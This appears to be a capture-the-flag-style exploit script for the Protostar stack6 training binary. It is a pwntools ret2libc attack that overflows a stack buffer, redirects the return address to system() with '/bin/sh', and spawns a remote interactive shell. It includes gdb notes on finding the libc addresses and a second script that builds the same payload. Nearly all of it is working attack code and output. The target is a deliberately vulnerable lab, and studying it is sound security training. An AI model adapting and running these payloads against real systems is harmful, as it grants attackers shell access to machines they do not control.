exploit_stack6.py
from pwn import *
import time

# stack6 is served over the network by a listener on port 1234 (address from the original setup)
p = remote('192.168.32.143', 1234)

eip = p32(0xb7ecffb0)            # address of system() in libc (from gdb, see notes below)
arg = p32(0xb7e97000 + 1176511)  # libc base + decimal offset of "/bin/sh" inside libc
ebp = b"DDDD"                    # junk, lands in the saved frame pointer

exploit = b""
exploit += b"\x90" * (80 - len(ebp))  # NOP filler up to the saved EBP (saved EIP sits at offset 80)
exploit += ebp                        # 4 bytes overwriting the saved EBP
# Build the fake call frame for system():
exploit += eip      # overwrite the saved EIP with the address of system() in libc
exploit += b"AAAA"  # return address system() uses once the shell exits (junk, we already have our shell)
exploit += arg      # first argument of system(): pointer to "/bin/sh" inside libc

time.sleep(2)
p.sendline(exploit)
p.interactive()
'''
Payload layout from low to high address (what the fake frame looks like on the stack):

    ----------------------------------------------
    | ......                 padding + saved EBP |
    | 0xb7ecffb0             saved EIP -> system |
    | AAAA                   RET after system()  |
    | 0xb7e97000+1176511     arg -> "/bin/sh"    |
    ----------------------------------------------

PoC
0. We cannot do a plain buffer overflow (returning into shellcode on the stack) because the
   return address is checked, so we return into libc instead.
1. Get the address of system() in libc:
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7ecffb0 <__libc_system>
2. Find where libc is mapped:
(gdb) info proc mappings
process 2306
cmdline = '/tmp/stack6'
cwd = '/tmp'
exe = '/tmp/stack6'
Mapped address spaces:
    Start Addr   End Addr       Size     Offset objfile
     0x8048000  0x8049000     0x1000          0 /tmp/stack6
     0x8049000  0x804a000     0x1000          0 /tmp/stack6
    0xb7e96000 0xb7e97000     0x1000          0
    0xb7e97000 0xb7fd5000   0x13e000          0 /lib/libc-2.11.2.so
    0xb7fd5000 0xb7fd6000     0x1000   0x13e000 /lib/libc-2.11.2.so
    0xb7fd6000 0xb7fd8000     0x2000   0x13e000 /lib/libc-2.11.2.so
    0xb7fd8000 0xb7fd9000     0x1000   0x140000 /lib/libc-2.11.2.so
    0xb7fd9000 0xb7fdc000     0x3000          0
    0xb7fe0000 0xb7fe2000     0x2000          0
    0xb7fe2000 0xb7fe3000     0x1000          0 [vdso]
    0xb7fe3000 0xb7ffe000    0x1b000          0 /lib/ld-2.11.2.so
    0xb7ffe000 0xb7fff000     0x1000    0x1a000 /lib/ld-2.11.2.so
    0xb7fff000 0xb8000000     0x1000    0x1b000 /lib/ld-2.11.2.so
    0xbffeb000 0xc0000000    0x15000          0 [stack]
3. Locate "/bin/sh" inside libc so we can pass it as the argument (strings -t d prints the
   offset in decimal, which is why it is added to the libc base as a decimal number above):
user@protostar:/tmp$ strings -t d /lib/libc-2.11.2.so | grep /bin/sh
1176511 /bin/sh
4. With libc mapped in the process there is no need for shellcode at all.
'''
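The address arithmetic and frame layout above can be done without pwntools and checked before anything is sent. The following is an added example, not part of the original repository: it parses the `info proc mappings` and `strings -t d` output quoted in the notes (embedded here as constructed input copied from those notes), derives the address of "/bin/sh", and builds the same ret2libc frame with `struct`. The `ret_allowed` filter reproduces the return-address check from Protostar's stack6.c (rejecting addresses in the 0xbf...... stack region), which is not shown on this page; the function names and the 80-byte offset to the saved EIP are assumptions matching the script above. Hard-coded addresses only work because the Protostar VM runs without ASLR.

```python
import struct

# Constructed input: the gdb mappings and strings output quoted in the notes above.
MAPPINGS = """\
0x8048000 0x8049000 0x1000 0 /tmp/stack6
0x8049000 0x804a000 0x1000 0 /tmp/stack6
0xb7e96000 0xb7e97000 0x1000 0
0xb7e97000 0xb7fd5000 0x13e000 0 /lib/libc-2.11.2.so
0xb7fd5000 0xb7fd6000 0x1000 0x13e000 /lib/libc-2.11.2.so
0xbffeb000 0xc0000000 0x15000 0 [stack]
"""
STRINGS = "1176511 /bin/sh\n"

SYSTEM_ADDR = 0xb7ecffb0  # from `p system` in gdb (see notes above)


def libc_mapping(mappings, libc="libc-"):
    """Return (start, end) of the first mapping whose objfile name contains `libc`.

    Anonymous mappings have only four fields, so they are skipped automatically."""
    for line in mappings.splitlines():
        fields = line.split()
        if len(fields) == 5 and libc in fields[4]:
            return int(fields[0], 16), int(fields[1], 16)
    raise ValueError("libc not found in mappings")


def string_offset(strings_out, needle="/bin/sh"):
    """Parse `strings -t d` output: a decimal file offset followed by the string."""
    for line in strings_out.splitlines():
        off, _, text = line.strip().partition(" ")
        if text == needle:
            return int(off, 10)
    raise ValueError("%r not found in strings output" % needle)


def ret_allowed(addr):
    # Mirrors the stack6.c filter (assumption, not on this page): a saved EIP
    # pointing into the 0xbf...... stack region is rejected, a libc address passes.
    return (addr & 0xbf000000) != 0xbf000000


def binsh_address(mappings, strings_out):
    """libc base + decimal offset of "/bin/sh", sanity-checked against the first libc mapping."""
    start, end = libc_mapping(mappings)
    addr = start + string_offset(strings_out)
    if not start <= addr < end:
        raise ValueError("offset falls outside the first libc mapping")
    return addr


def build_payload(system_addr, binsh_addr, ret_offset=80, after_system=b"AAAA"):
    """Filler up to the saved EIP, then the fake frame: system | ret | &"/bin/sh"."""
    if not ret_allowed(system_addr):
        raise ValueError("return address would be rejected by stack6")
    pad = b"\x90" * (ret_offset - 4) + b"DDDD"  # NOPs plus junk saved EBP
    return (pad
            + struct.pack("<I", system_addr)   # saved EIP -> system()
            + after_system                     # where system() returns to
            + struct.pack("<I", binsh_addr))   # first argument: "/bin/sh"


if __name__ == "__main__":
    payload = build_payload(SYSTEM_ADDR, binsh_address(MAPPINGS, STRINGS))
    print("/bin/sh at 0x%08x, payload %d bytes" % (binsh_address(MAPPINGS, STRINGS), len(payload)))
    print(payload.hex())
```

The bounds check in `binsh_address` catches the classic mistake of treating the `strings -t d` offset as hexadecimal, and `ret_allowed` shows why a libc address survives the check that kills a return into the stack.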